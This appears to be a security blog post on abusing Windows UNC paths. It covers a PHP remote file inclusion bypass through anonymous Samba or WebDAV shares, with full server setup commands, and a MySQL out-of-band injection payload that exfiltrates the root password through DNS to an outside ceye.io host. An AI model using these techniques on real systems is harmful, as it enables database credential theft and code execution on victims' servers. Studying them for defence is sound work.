The Microsoft Windows UNC
The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:
Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. The UNC syntax is extended with optional components to denote use of SSL and TCP/IP port number, a WebDAV URL of
Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction
A few days ago, there’s an article on Twitter about exploiting remote file inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction. This is a perfect trick.
In PHP Configuration file, allow_url_include wrapper by-default set to “Off” which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if “allow_url_include” and “allow_url_fopen” both are set to “Off”.
This trick exploits Windows UNC’s characteristics. Attack chain:
In addition to SMB, you can also use unauthorized WebDAV.
Configuring the Samba Server with anonymous read access (Linux Machine).
In Kali Linux, install the Samba using the following commands:
apt-get install samba
Create SMB share directory:
Configure permissions on newly created SMB share directory:
chmod 0555 /var/www/html/pub/ chown -R nobody:nogroup /var/www/html/pub/
Run below mentioned command to remove default content of SAMBA server config file:
echo > /etc/samba/smb.conf
Put below mentioned content in file
[global] workgroup = WORKGROUP server string = Samba Server %v netbios name = indishell-lab security = user map to guest = bad user name resolve order = bcast host dns proxy = no bind interfaces only = yes [ethan] path = /var/www/html/pub writable = no guest ok = yes guest only = yes read only = yes directory mode = 0555 force user = nobody
Now, restart Samba Server to apply new configuration spcified in config file
service smbd restart
Once SAMBA server has been restarted successfully, try to access SMB share and make sure SAMBA server is not asking for credentials:
Start a WebDAV service with Docker:
Use https://github.com/BytemarkHosting/docker-webdav. Just put the result file in
/root/WebDAV/data, but username and password are necessary. :(
docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav
docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav
The WebDAV client of Windows relies on the Webclient Service (Default opening). If you want to access the WebDAV Service through UNC, you have to start the service first.
Notice: The webclient of windows will change the path of requesting WebDAV to uppercase, while Apache defaults to case-sensitive when matching paths. It discovered by log file. The uppercase path is blocked directly and returned to 403.
You can use pure digital paths and file names to solve this problem.
Vul2: MySQL OOB Injection
Out-of-band injection involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.
From the Payloads provided by CEYE, it can be seen that OOB injection is very well researched in MSSQL and Oracle. But in MySQL and PostgreSQL, it is limited. The payload provided by CEYE for MySQL is:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
You can see that there are a lot of backslashes
Notice: This also exploits Windows UNC’s characteristics.
This option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the
LOAD DATA and
SELECT ... INTO OUTFILE statements and the
LOAD_FILE() function. Refer to the link: https://dev.mysql.com/doc/refman/5.7/en/server-options.html
|Command-Line Format|| |
|System Variable|| |
|Default Value (>= 5.7.6)||platform specific|
|Default Value (<= 5.7.5)||empty string|
|Valid Values (>= 5.7.6)||empty string, dirname, NULL|
|Valid Values (<= 5.7.5)||empty string, dirname|